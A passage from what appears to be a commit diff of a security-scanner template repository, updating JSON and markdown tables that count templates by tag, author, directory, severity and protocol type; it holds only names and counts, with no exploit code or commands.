gateone","count":1},{"name":"yii","count":1},{"name":"mailchimp","count":1},{"name":"clusterengine","count":1},{"name":"fiori","count":1},{"name":"szhe","count":1},{"name":"node-red-dashboard","count":1},{"name":"fortilogger","count":1},{"name":"alerta","count":1},{"name":"domxss","count":1},{"name":"spectracom","count":1},{"name":"oneblog","count":1},{"name":"shopxo","count":1},{"name":"nomad","count"
:1},{"name":"api-manager","count":1},{"name":"plugin","count":1},{"name":"manageengine","count":1},{"name":"acme","count":1},{"name":"cloudflare","count":1},{"name":"asus","count":1},{"name":"elascticsearch","count":1},{"name":"phpfastcache","count":1},{"name":"redcap","count":1},{"name":"accela","count":1},{"name":"sureline","count":1}],"authors":[{"name":"dhiyaneshdk","count":248},{"name":"pikpikcu","count":246},{"name":"pdteam","count":198},{"name":"daffainfo","count":183},{"name":"geeknik","count":150},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"pussycat0x","count":55},{"name":"princechaddha","count":55},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"0x_akoko","count":25},{"name":"organiccrap","count":24},{"name":"philippedelteil","count":21},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"nadino","count":9},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic 
(@tech)","count":7},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"meme-lord","count":6},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"xelkomy","count":4},{"name":"0w4ys","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"z3bd","count":3},{"name":"lu4nx","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"f1tz","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"vsh00t","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"fyoorer","count":3},{"name":"hahwul","count":2},{"name":"random-robbie","count":2},{"name":"w4cky_","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"kiblyn11","count":2},{"name":"udit_thakkur","count":2},{"name":"pxmme1337","count":2},{"name":"unstabl3","count":2},{"name":"bp0lr","count":2},{"name":"foulenzer","count":2},{"name":"joeldeleep","count":2},{"name":"manas_harsh","count":2},{"name":"vavkamil","count":2},{"name":"socketz","count":2},{"name":"davidmckennirey","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"moritz nentwig","count":2},{"name":"parth","count":2},{"name":"g4l1t0","count":2},{"name":"ree4pwn","count":2},{"name":"whoever","count":2},{"name":"nkxxkn","count":2},{"name":"0xelkomy","count":2},{"name":"hetroublemakr","count":2},{"name":"mahendra purbia 
(mah3sec_)","count":2},{"name":"arcc","count":2},{"name":"bsysop","count":2},{"name":"0xsapra","count":2},{"name":"x1m_martijn","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"koti2","count":2},{"name":"dheerajmadhukar","count":2},{"name":"huowuzhao","count":2},{"name":"0xcrypto","count":2},{"name":"swissky","count":2},{"name":"convisoappsec","count":2},{"name":"zomsop82","count":2},{"name":"gal nagli","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"afaq","count":2},{"name":"sushantkamble","count":2},{"name":"johnjhacking","count":2},{"name":"alifathi-h1","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xrudra","count":2},{"name":"0xprial","count":2},{"name":"randomrobbie","count":2},{"name":"c3l3si4n","count":1},{"name":"rtcms","count":1},{"name":"hakluke","count":1},{"name":"un-fmunozs","count":1},{"name":"skeltavik","count":1},{"name":"52971","count":1},{"name":"_darrenmartyn","count":1},{"name":"zandros0","count":1},{"name":"hanlaomo","count":1},{"name":"patralos","count":1},{"name":"revblock","count":1},{"name":"0xtavian","count":1},{"name":"rodnt","count":1},{"name":"abison_binoy","count":1},{"name":"s1r1u5_","count":1},{"name":"izn0u","count":1},{"name":"makyotox","count":1},{"name":"dawid-czarnecki","count":1},{"name":"borna nematzadeh","count":1},{"name":"sy3omda","count":1},{"name":"flag007","count":1},{"name":"pratik khalane","count":1},{"name":"j33n1k4","count":1},{"name":"mhdsamx","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"yavolo","count":1},{"name":"yashanand155","count":1},{"name":"elder tao","count":1},{"name":"vzamanillo","count":1},{"name":"nytr0gen","count":1},{"name":"elmahdi","count":1},{"name":"shreyapohekar","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro 
@am0nt31r0","count":1},{"name":"0h1in9e","count":1},{"name":"ooooooo_q","count":1},{"name":"ldionmarcil","count":1},{"name":"becivells","count":1},{"name":"sec_hawk","count":1},{"name":"iampritam","count":1},{"name":"apt-mirror","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"fmunozs","count":1},{"name":"adrianmf","count":1},{"name":"mah3sec_","count":1},{"name":"juicypotato1","count":1},{"name":"undefl0w","count":1},{"name":"ajaysenr","count":1},{"name":"willd96","count":1},{"name":"qlkwej","count":1},{"name":"daviey","count":1},{"name":"0xrod","count":1},{"name":"omarkurt","count":1},{"name":"pdp","count":1},{"name":"evolutionsec","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"zhenwarx","count":1},{"name":"philippdelteil","count":1},{"name":"regala_","count":1},{"name":"0xteles","count":1},{"name":"bjhulst","count":1},{"name":"wabafet","count":1},{"name":"b0yd","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"intx0x80","count":1},{"name":"naglinagli","count":1},{"name":"sickwell","count":1},{"name":"bernardofsr","count":1},{"name":"knassar702","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit 
soni)","count":1},{"name":"kabirsuda","count":1},{"name":"shelld3v","count":1},{"name":"divya_mudgal","count":1},{"name":"geraldino2","count":1},{"name":"gboddin","count":1},{"name":"petruknisme","count":1},{"name":"aresx","count":1},{"name":"deena","count":1},{"name":"akshansh","count":1},{"name":"retr0","count":1},{"name":"b4uh0lz","count":1},{"name":"tim_koopmans","count":1},{"name":"luskabol","count":1},{"name":"0ut0fb4nd","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"exploitation","count":1},{"name":"blckraven","count":1},{"name":"_c0wb0y_","count":1},{"name":"berkdusunur","count":1},{"name":"andirrahmani1","count":1},{"name":"thevillagehacker","count":1},{"name":"jteles","count":1},{"name":"taielab","count":1},{"name":"ohlinge","count":1},{"name":"sicksec","count":1},{"name":"mass0ma","count":1},{"name":"pudsec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"yashgoti","count":1},{"name":"b0rn2r00t","count":1},{"name":"streetofhackerr007","count":1},{"name":"mubassirpatel","count":1},{"name":"absshax","count":1},{"name":"bad5ect0r","count":1},{"name":"its0x08","count":1},{"name":"whynotke","count":1},{"name":"noamrathaus","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"ipanda","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kre80r","count":1},{"name":"udyz","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"infosecsanyam","count":1},{"name":"alph4byt3","count":1},{"name":"sullo","count":1},{"name":"x6263","count":1},{"name":"andysvints","count":1},{"name":"remonsec","count":1},{"name":"co0nan","count":1},{"name":"manuelbua","count":1},{"name":"toufik 
airane","count":1},{"name":"defr0ggy","count":1},{"name":"mesaglio","count":1},{"name":"d0rkerdevil","count":1},{"name":"furkansenan","count":1},{"name":"ringo","count":1},{"name":"idealphase","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sshell","count":1},{"name":"fopina","count":1},{"name":"tirtha_mandal","count":1},{"name":"akash.c","count":1},{"name":"kurohost","count":1},{"name":"smaranchand","count":1},{"name":"thezakman","count":1},{"name":"notsoevilweasel","count":1},{"name":"luci","count":1},{"name":"jeya seelan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"raesene","count":1},{"name":"me9187","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"alperenkesk","count":1},{"name":"micha3lb3n","count":1},{"name":"bolli95","count":1},{"name":"shifacyclewla","count":1},{"name":"ilovebinbash","count":1}],"directory":[{"name":"cves","count":674},{"name":"vulnerabilities","count":284},{"name":"exposed-panels","count":235},{"name":"exposures","count":186},{"name":"technologies","count":170},{"name":"misconfiguration","count":129},{"name":"takeovers","count":71},{"name":"default-logins","count":54},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":30},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":615},{"name":"high","count":535},{"name":"medium","count":413},{"name":"critical","count":236},{"name":"low","count":161}],"types":[{"name":"http","count":1859},{"name":"file","count":46},{"name":"network","count":39},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 30f542f672..a7efc05b55 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md 
@@ -1,741 +1,750 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | -| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | -| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | -| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | -| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | -| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | -| cve2021 | 106 | pussycat0x | 48 | workflows | 35 | | | | | -| tech | 106 | gaurang | 42 | network | 30 | | | | | -| config | 93 | ice3man | 26 | miscellaneous | 28 | | | | | -| cve2019 | 91 | organiccrap | 24 | iot | 23 | | | | | -| cve2018 | 80 | 0x_akoko | 24 | dns | 11 | | | | | -| takeover | 74 | philippedelteil | 19 | fuzzing | 9 | | | | | -| | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | -| apache | 66 | milo2012 | 14 | headless | 5 | | | | | -| token | 64 | techbrunchfr | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 58 | pr3r00t | 13 | | | | | | | -| iot | 56 | suman_kar | 12 | | | | | | | -| joomla | 52 | cyllective | 11 | | | | | | | -| cve2017 | 48 | r3dg33k | 11 | | | | | | | -| file | 46 | righettod | 10 | | | | | | | -| unauth | 45 | random_robbie | 10 | | | | | | | -| oob | 45 | wdahlenb | 9 | | | | | | | -| cve2010 | 44 | hackergautam | 9 | | | | | | | +| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | +| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | +| lfi | 228 | pdteam | 198 | exposed-panels 
| 235 | medium | 413 | network | 39 | +| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | +| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | +| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | +| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | +| wp-plugin | 139 | pussycat0x | 55 | file | 46 | | | | | +| cve2021 | 112 | princechaddha | 55 | workflows | 35 | | | | | +| tech | 111 | gaurang | 42 | network | 30 | | | | | +| config | 93 | ice3man | 26 | miscellaneous | 24 | | | | | +| cve2019 | 90 | 0x_akoko | 25 | iot | 23 | | | | | +| cve2018 | 80 | organiccrap | 24 | dns | 11 | | | | | +| takeover | 74 | philippedelteil | 21 | fuzzing | 9 | | | | | +| apache | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | +| | 66 | milo2012 | 14 | headless | 5 | | | | | +| token | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 60 | techbrunchfr | 13 | | | | | | | +| joomla | 59 | suman_kar | 12 | | | | | | | +| iot | 58 | cyllective | 11 | | | | | | | +| cve2010 | 51 | r3dg33k | 11 | | | | | | | +| cve2017 | 49 | random_robbie | 10 | | | | | | | +| oob | 48 | righettod | 10 | | | | | | | +| file | 46 | wdahlenb | 9 | | | | | | | +| unauth | 45 | melbadry9 | 9 | | | | | | | | network | 39 | nadino | 9 | | | | | | | -| sqli | 37 | melbadry9 | 9 | | | | | | | -| ssrf | 32 | aashiq | 8 | | | | | | | -| cve2016 | 32 | that_juan_ | 8 | | | | | | | -| workflow | 30 | iamthefrogy | 8 | | | | | | | -| oracle | 30 | 0x240x23elu | 7 | | | | | | | +| sqli | 38 | hackergautam | 9 | | | | | | | +| ssrf | 35 | that_juan_ | 8 | | | | | | | +| cve2016 | 32 | aashiq | 8 | | | | | | | +| oracle | 31 | iamthefrogy | 8 | | | | | | | | logs | 30 | kophjager007 | 7 | | | | | | | -| jira | 28 | techryptic (@tech) | 7 | | | | | | | -| misc | 27 | oppsec | 7 | | | | | | | -| atlassian | 27 | randomstr1ng | 7 | | | | | | | -| redirect | 26 | 
dogasantos | 7 | | | | | | | +| workflow | 30 | techryptic (@tech) | 7 | | | | | | | +| redirect | 28 | randomstr1ng | 7 | | | | | | | +| jira | 28 | dogasantos | 7 | | | | | | | +| atlassian | 27 | emadshanab | 7 | | | | | | | | listing | 25 | dr_set | 7 | | | | | | | -| generic | 22 | harshbothra_ | 7 | | | | | | | -| aem | 19 | emadshanab | 7 | | | | | | | -| cisco | 19 | __fazal | 6 | | | | | | | -| router | 19 | puzzlepeaches | 6 | | | | | | | -| cve2015 | 19 | caspergn | 6 | | | | | | | -| sap | 18 | meme-lord | 6 | | | | | | | -| disclosure | 18 | elsfa7110 | 5 | | | | | | | -| auth-bypass | 17 | joanbono | 5 | | | | | | | -| springboot | 16 | yanyun | 5 | | | | | | | -| cve2014 | 15 | panch0r3d | 5 | | | | | | | -| cve2012 | 14 | iamnoooob | 5 | | | | | | | -| debug | 14 | rootxharsh | 5 | | | | | | | -| android | 13 | pentest_swissky | 5 | | | | | | | -| cve2011 | 13 | logicalhunter | 5 | | | | | | | -| misconfig | 13 | ganofins | 5 | | | | | | | -| struts | 13 | nodauf | 4 | | | | | | | +| misc | 23 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 20 | harshbothra_ | 7 | | | | | | | +| disclosure | 20 | oppsec | 7 | | | | | | | +| cisco | 19 | meme-lord | 6 | | | | | | | +| generic | 19 | logicalhunter | 6 | | | | | | | +| aem | 19 | puzzlepeaches | 6 | | | | | | | +| router | 19 | caspergn | 6 | | | | | | | +| sap | 18 | __fazal | 6 | | | | | | | +| auth-bypass | 17 | ganofins | 5 | | | | | | | +| springboot | 16 | elsfa7110 | 5 | | | | | | | +| debug | 15 | yanyun | 5 | | | | | | | +| cve2014 | 15 | joanbono | 5 | | | | | | | +| misconfig | 14 | panch0r3d | 5 | | | | | | | +| cve2012 | 14 | rootxharsh | 5 | | | | | | | +| cve2011 | 13 | pentest_swissky | 5 | | | | | | | +| struts | 13 | iamnoooob | 5 | | | | | | | +| php | 13 | xelkomy | 4 | | | | | | | +| adobe | 13 | e_schultze_ | 4 | | | | | | | | fuzz | 13 | github.com/its0x08 | 4 | | | | | | | -| adobe | 12 | e_schultze_ | 4 | | | | | | | -| weblogic | 12 | xelkomy | 4 | | | | | | | -| jenkins | 12 | 
tess | 3 | | | | | | | -| dns | 12 | dudez | 3 | | | | | | | -| php | 12 | emenalf | 3 | | | | | | | -| dlink | 12 | thomas_from_offensity | 3 | | | | | | | -| zoho | 11 | impramodsargar | 3 | | | | | | | -| cve2013 | 11 | vsh00t | 3 | | | | | | | -| devops | 11 | shine | 3 | | | | | | | -| ftp | 9 | lu4nx | 3 | | | | | | | -| magento | 9 | shifacyclewala | 3 | | | | | | | -| xxe | 9 | jarijaas | 3 | | | | | | | -| aws | 9 | yash anand @yashanand155 | 3 | | | | | | | -| login | 8 | f1tz | 3 | | | | | | | -| airflow | 8 | _generic_human_ | 3 | | | | | | | -| gitlab | 8 | fyoorer | 3 | | | | | | | -| rails | 8 | incogbyte | 3 | | | | | | | -| scada | 8 | mavericknerd | 3 | | | | | | | -| ruijie | 8 | binaryfigments | 3 | | | | | | | -| cnvd | 8 | z3bd | 3 | | | | | | | -| cms | 7 | 0w4ys | 3 | | | | | | | -| nginx | 7 | gal nagli | 2 | | | | | | | -| backup | 7 | random-robbie | 2 | | | | | | | -| vmware | 7 | dheerajmadhukar | 2 | | | | | | | -| cve2009 | 7 | pxmme1337 | 2 | | | | | | | -| citrix | 6 | hahwul | 2 | | | | | | | -| coldfusion | 6 | arcc | 2 | | | | | | | -| docker | 6 | fabaff | 2 | | | | | | | -| laravel | 6 | whoever | 2 | | | | | | | -| jetty | 6 | alifathi-h1 | 2 | | | | | | | -| api | 6 | ehsahil | 2 | | | | | | | -| google | 6 | parth | 2 | | | | | | | -| solr | 6 | ree4pwn | 2 | | | | | | | -| dell | 6 | moritz nentwig | 2 | | | | | | | -| rconfig | 6 | hetroublemakr | 2 | | | | | | | -| django | 6 | 0xrudra | 2 | | | | | | | -| files | 6 | 0xelkomy | 2 | | | | | | | -| cve2008 | 6 | vavkamil | 2 | | | | | | | -| netgear | 6 | w4cky_ | 2 | | | | | | | -| drupal | 5 | zomsop82 | 2 | | | | | | | -| printer | 5 | 0xprial | 2 | | | | | | | -| headless | 5 | bing0o | 2 | | | | | | | -| phpmyadmin | 5 | cocxanh | 2 | | | | | | | -| confluence | 5 | afaq | 2 | | | | | | | -| wp-theme | 5 | randomrobbie | 2 | | | | | | | -| windows | 5 | manas_harsh | 2 | | | | | | | -| circarlife | 5 | 0xcrypto | 2 | | | | | | | -| fileupload | 5 | nkxxkn | 2 | | | | 
| | | -| ssti | 5 | 0xsapra | 2 | | | | | | | -| microsoft | 5 | x1m_martijn | 2 | | | | | | | -| ibm | 5 | bp0lr | 2 | | | | | | | -| lucee | 5 | lotusdll | 2 | | | | | | | -| iis | 5 | gevakun | 2 | | | | | | | -| java | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| dedecms | 5 | joeldeleep | 2 | | | | | | | -| jolokia | 4 | koti2 | 2 | | | | | | | -| tomcat | 4 | swissky | 2 | | | | | | | -| hp | 4 | sushantkamble | 2 | | | | | | | -| glpi | 4 | davidmckennirey | 2 | | | | | | | -| deserialization | 4 | foulenzer | 2 | | | | | | | -| crlf | 4 | mohammedsaneem | 2 | | | | | | | -| thinkphp | 4 | amsda | 2 | | | | | | | -| zimbra | 4 | bsysop | 2 | | | | | | | -| samsung | 4 | unstabl3 | 2 | | | | | | | -| wso2 | 4 | kiblyn11 | 2 | | | | | | | -| webserver | 4 | udit_thakkur | 2 | | | | | | | -| hongdian | 4 | yashanand155 | 1 | | | | | | | -| moodle | 4 | andirrahmani1 | 1 | | | | | | | -| grafana | 4 | j33n1k4 | 1 | | | | | | | -| elastic | 4 | johnjhacking | 1 | | | | | | | -| firmware | 4 | omarkurt | 1 | | | | | | | -| thinkcmf | 4 | blckraven | 1 | | | | | | | -| symfony | 4 | bad5ect0r | 1 | | | | | | | -| nodejs | 4 | streetofhackerr007 | 1 | | | | | | | -| artifactory | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| android | 13 | nodauf | 4 | | | | | | | +| weblogic | 12 | thomas_from_offensity | 3 | | | | | | | +| devops | 12 | impramodsargar | 3 | | | | | | | +| dlink | 12 | emenalf | 3 | | | | | | | +| dns | 12 | incogbyte | 3 | | | | | | | +| jenkins | 12 | 0w4ys | 3 | | | | | | | +| cve2013 | 11 | mavericknerd | 3 | | | | | | | +| zoho | 11 | shine | 3 | | | | | | | +| magento | 9 | f1tz | 3 | | | | | | | +| xxe | 9 | binaryfigments | 3 | | | | | | | +| ftp | 9 | fyoorer | 3 | | | | | | | +| aws | 9 | vsh00t | 3 | | | | | | | +| ruijie | 8 | lu4nx | 3 | | | | | | | +| scada | 8 | z3bd | 3 | | | | | | | +| login | 8 | dudez | 3 | | | | | | | +| cnvd | 8 | jarijaas | 3 | | | | | | | +| gitlab | 8 | shifacyclewala | 3 | | | | | | | +| 
airflow | 8 | tess | 3 | | | | | | | +| rails | 8 | _generic_human_ | 3 | | | | | | | +| cms | 7 | yash anand @yashanand155 | 3 | | | | | | | +| kubernetes | 7 | hahwul | 2 | | | | | | | +| nginx | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| netgear | 7 | swissky | 2 | | | | | | | +| cve2009 | 7 | 0xprial | 2 | | | | | | | +| files | 7 | w4cky_ | 2 | | | | | | | +| backup | 7 | 0xcrypto | 2 | | | | | | | +| coldfusion | 7 | 0xrudra | 2 | | | | | | | +| vmware | 7 | cocxanh | 2 | | | | | | | +| google | 6 | gal nagli | 2 | | | | | | | +| api | 6 | lotusdll | 2 | | | | | | | +| solr | 6 | koti2 | 2 | | | | | | | +| cve2008 | 6 | fabaff | 2 | | | | | | | +| django | 6 | pxmme1337 | 2 | | | | | | | +| dell | 6 | udit_thakkur | 2 | | | | | | | +| rconfig | 6 | random-robbie | 2 | | | | | | | +| jetty | 6 | unstabl3 | 2 | | | | | | | +| docker | 6 | ree4pwn | 2 | | | | | | | +| laravel | 6 | johnjhacking | 2 | | | | | | | +| citrix | 6 | dheerajmadhukar | 2 | | | | | | | +| confluence | 6 | 0xsapra | 2 | | | | | | | +| windows | 5 | afaq | 2 | | | | | | | +| circarlife | 5 | foulenzer | 2 | | | | | | | +| drupal | 5 | 0xelkomy | 2 | | | | | | | +| headless | 5 | bp0lr | 2 | | | | | | | +| lucee | 5 | moritz nentwig | 2 | | | | | | | +| microsoft | 5 | arcc | 2 | | | | | | | +| fileupload | 5 | bsysop | 2 | | | | | | | +| java | 5 | hetroublemakr | 2 | | | | | | | +| nodejs | 5 | randomrobbie | 2 | | | | | | | +| ssti | 5 | huowuzhao | 2 | | | | | | | +| printer | 5 | nkxxkn | 2 | | | | | | | +| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | +| iis | 5 | socketz | 2 | | | | | | | +| wp-theme | 5 | davidmckennirey | 2 | | | | | | | +| dedecms | 5 | gevakun | 2 | | | | | | | +| ibm | 5 | joeldeleep | 2 | | | | | | | +| hongdian | 4 | zomsop82 | 2 | | | | | | | +| magmi | 4 | mohammedsaneem | 2 | | | | | | | +| crlf | 4 | amsda | 2 | | | | | | | +| samsung | 4 | ehsahil | 2 | | | | | | | +| wso2 | 4 | whoever | 2 | | | | | | | +| solarwinds | 4 | bing0o | 2 | | | | | | 
| +| vpn | 4 | vavkamil | 2 | | | | | | | +| traversal | 4 | sushantkamble | 2 | | | | | | | +| artifactory | 4 | r3naissance | 2 | | | | | | | +| deserialization | 4 | convisoappsec | 2 | | | | | | | +| tomcat | 4 | g4l1t0 | 2 | | | | | | | +| firmware | 4 | x1m_martijn | 2 | | | | | | | +| zimbra | 4 | alifathi-h1 | 2 | | | | | | | +| thinkphp | 4 | manas_harsh | 2 | | | | | | | +| jolokia | 4 | parth | 2 | | | | | | | +| glpi | 4 | kurohost | 1 | | | | | | | +| grafana | 4 | ldionmarcil | 1 | | | | | | | +| elastic | 4 | notsoevilweasel | 1 | | | | | | | +| exchange | 4 | luskabol | 1 | | | | | | | +| asp | 4 | c3l3si4n | 1 | | | | | | | +| buffalo | 4 | zandros0 | 1 | | | | | | | +| thinkcmf | 4 | udyz | 1 | | | | | | | +| hp | 4 | sickwell | 1 | | | | | | | +| symfony | 4 | b4uh0lz | 1 | | | | | | | +| webserver | 4 | akshansh | 1 | | | | | | | +| moodle | 4 | j3ssie/geraldino2 | 1 | | | | | | | +| zhiyuan | 3 | deena | 1 | | | | | | | +| ebs | 3 | revblock | 1 | | | | | | | +| fpd | 3 | hanlaomo | 1 | | | | | | | +| lfr | 3 | mah3sec_ | 1 | | | | | | | +| resin | 3 | akash.c | 1 | | | | | | | +| caucho | 3 | defr0ggy | 1 | | | | | | | +| mongodb | 3 | elder tao | 1 | | | | | | | +| ofbiz | 3 | divya_mudgal | 1 | | | | | | | +| openssh | 3 | x6263 | 1 | | | | | | | +| fanruan | 3 | _c0wb0y_ | 1 | | | | | | | +| opensis | 3 | me9187 | 1 | | | | | | | +| git | 3 | @dwisiswant0 | 1 | | | | | | | +| amazon | 3 | ohlinge | 1 | | | | | | | +| oa | 3 | regala_ | 1 | | | | | | | +| terramaster | 3 | mass0ma | 1 | | | | | | | +| nacos | 3 | evolutionsec | 1 | | | | | | | +| nosqli | 3 | johnk3r | 1 | | | | | | | +| targa | 3 | co0nan | 1 | | | | | | | +| vbulletin | 3 | daviey | 1 | | | | | | | +| intrusive | 3 | berkdusunur | 1 | | | | | | | +| zabbix | 3 | 0xtavian | 1 | | | | | | | +| slack | 3 | th3.d1p4k | 1 | | | | | | | +| r-seenet | 3 | shifacyclewla | 1 | | | | | | | +| microstrategy | 3 | bjhulst | 1 | | | | | | | +| ssh | 3 | omarkurt | 1 | | | | | | | +| 
httpd | 3 | fmunozs | 1 | | | | | | | +| itop | 3 | mesaglio | 1 | | | | | | | +| log | 3 | sicksec | 1 | | | | | | | +| kevinlab | 3 | kabirsuda | 1 | | | | | | | +| kafka | 3 | iampritam | 1 | | | | | | | +| bitrix | 3 | _harleo | 1 | | | | | | | +| backups | 3 | ipanda | 1 | | | | | | | +| springcloud | 3 | sy3omda | 1 | | | | | | | +| nexus | 3 | aceseven (digisec360) | 1 | | | | | | | +| tikiwiki | 3 | bernardofsr | 1 | | | | | | | +| bypass | 3 | toufik airane | 1 | | | | | | | +| couchdb | 2 | yashanand155 | 1 | | | | | | | +| cve2005 | 2 | mubassirpatel | 1 | | | | | | | +| flir | 2 | streetofhackerr007 | 1 | | | | | | | +| natshell | 2 | ilovebinbash | 1 | | | | | | | +| mida | 2 | skeltavik | 1 | | | | | | | +| nagios | 2 | un-fmunozs | 1 | | | | | | | +| npm | 2 | 0ut0fb4nd | 1 | | | | | | | +| splunk | 2 | its0x08 | 1 | | | | | | | +| guacamole | 2 | zhenwarx | 1 | | | | | | | +| yapi | 2 | exploitation | 1 | | | | | | | +| maian | 2 | rtcms | 1 | | | | | | | +| waf | 2 | smaranchand | 1 | | | | | | | +| sonicwall | 2 | alperenkesk | 1 | | | | | | | +| cve2007 | 2 | thevillagehacker | 1 | | | | | | | +| jeedom | 2 | aresx | 1 | | | | | | | +| geowebserver | 2 | luci | 1 | | | | | | | +| status | 2 | adrianmf | 1 | | | | | | | +| plesk | 2 | knassar702 | 1 | | | | | | | +| prometheus | 2 | kre80r | 1 | | | | | | | +| globalprotect | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| seeyon | 2 | andysvints | 1 | | | | | | | +| keycloak | 2 | d0rkerdevil | 1 | | | | | | | +| frp | 2 | noamrathaus | 1 | | | | | | | +| telerik | 2 | pudsec | 1 | | | | | | | +| github | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| akkadian | 2 | 52971 | 1 | | | | | | | +| smb | 2 | yashgoti | 1 | | | | | | | +| prestashop | 2 | blckraven | 1 | | | | | | | +| chiyu | 2 | jteles | 1 | | | | | | | +| leak | 2 | nytr0gen | 1 | | | | | | | +| avantfax | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| dolibarr | 2 | alph4byt3 | 1 | | | 
